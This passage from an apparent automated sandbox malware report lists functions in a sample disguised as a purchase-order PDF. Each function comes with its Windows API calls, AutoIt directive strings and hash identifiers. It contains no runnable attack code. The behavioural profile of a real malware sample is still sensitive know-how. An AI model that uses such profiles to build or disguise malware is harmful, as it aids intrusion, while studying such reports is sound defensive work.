                                                                                                                                                                                                                                                                                                            • _wcsrchr.LIBCMT ref: 0043674C
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                                                                                                                                                                                            • String ID: \
                                                                                                                                                                                                                                                                                                            • API String ID: 321622961-2967466578
                                                                                                                                                                                                                                                                                                            • Opcode ID: 89fee19c6af83de540ba808c0374432e2a46b6c40b39e15789b2a1855c2cb0dc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89fee19c6af83de540ba808c0374432e2a46b6c40b39e15789b2a1855c2cb0dc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                                                                                                                                                                                                                                                            Function 0044C80C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wcsnicmp
                                                                                                                                                                                                                                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                                                                                                                                                            • API String ID: 1038674560-2734436370
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4ab3b81ba6b37d495ecac8d13b9aeab9278ef9f555502ff5b318f61fd8e6d58e
                                                                                                                                                                                                                                                                                                            • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ab3b81ba6b37d495ecac8d13b9aeab9278ef9f555502ff5b318f61fd8e6d58e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                                                                                                                                                                                                                                                            Function 00441561 Relevance: 12.1, APIs: 8, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0044157D
                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00441585
                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                                                                                                                                                                                                                                                            Function 004140DB Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                                                                                                                                                                                                            • __freefls@4.LIBCMT ref: 00414135
                                                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1925773019-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                                                                                                                                                                                                            • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                                                                                                                                                                                                                                                            Function 004357AD Relevance: 12.0, APIs: 8, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                                                                                                                                                                                                                                                            Function 00464A0E Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00464ADE
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?), ref: 00464B1F
                                                                                                                                                                                                                                                                                                            • gethostbyname.WSOCK32(?), ref: 00464B29
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00464B92
                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                                                                                                                                                                                                                                            • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3424476444-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                                                                                                                                                                                                                                            Function 00440B39 Relevance: 10.8, APIs: 7, Instructions: 261COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4116985748-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                                                                                                                                                                                                                                            Function 0046AB70 Relevance: 10.8, APIs: 7, Instructions: 260registryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ConnectRegistry_wcslen
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 535477410-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                                                                                                                                                                                                            • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                                                                                                                                                                                                                                            Function 0045377F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004538C4
                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00453960
                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                                                                                                                                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 3530711334-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                                                                                                                                                                                                                                                            • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                                                                                                                                                                                                                                            Function 0047395A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                                                                                                                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                                                                                                                                                                                                                                            Strings
